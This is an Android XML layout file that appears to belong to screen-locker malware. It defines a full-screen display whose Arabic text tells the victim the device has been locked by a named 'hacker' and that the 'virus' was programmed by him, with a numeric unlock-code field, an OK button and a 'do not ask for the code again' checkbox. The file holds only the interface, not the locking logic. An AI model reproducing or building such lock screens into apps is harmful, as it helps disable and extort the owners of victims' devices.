<?xml version="1.0" encoding="utf-8" ?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" android:gravity="center" android:orientation="vertical" android:background="#ff00108c" android:layout_width="wrap_content" android:layout_height="wrap_content">
	<ScrollView android:layout_width="fill_parent" android:layout_height="fill_parent">
		<LinearLayout android:gravity="center" android:orientation="vertical" android:background="#ff000000" android:layout_width="wrap_content" android:layout_height="wrap_content">
			<TextView android:textAppearance="?android:textAppearanceLarge" android:textSize="22.0sp" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="تم قفل جهازك بواسطة الهكر بسام الشيباني" />
			<TextView android:textAppearance="?android:textAppearanceMedium" android:layout_width="wrap_content" android:layout_height="wrap_content" />
			<EditText android:textStyle="italic" android:textColor="#ff2ad91c" android:gravity="center" android:id="@id/mainEditText1" android:layout_width="wrap_content" android:layout_height="wrap_content" android:ems="10" android:inputType="number" />
			<Button android:id="@id/mainButton1" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="OK" />
			<TextView android:textAppearance="?android:textAppearanceMedium" android:layout_width="wrap_content" android:layout_height="wrap_content" />
			<CheckBox android:id="@id/mainCheckBox1" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="عدم طلب الرمز مرة اخرى" />
			<TextView android:textAppearance="?android:textAppearanceMedium" android:layout_width="wrap_content" android:layout_height="wrap_content" />
			<TextView android:textSize="19.0sp" android:textColor="#ffff0f00" android:gravity="center" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="تمت برمجة الفيروس بواسطة الهكر بسام الشيباني" />
			<TextClock android:textSize="19.0sp" android:textColor="#fffd0e00" android:gravity="center" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="ophiuchus" />
			<TextView android:gravity="center" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="KING_HAKING" />
		</LinearLayout>
	</ScrollView>
</LinearLayout>
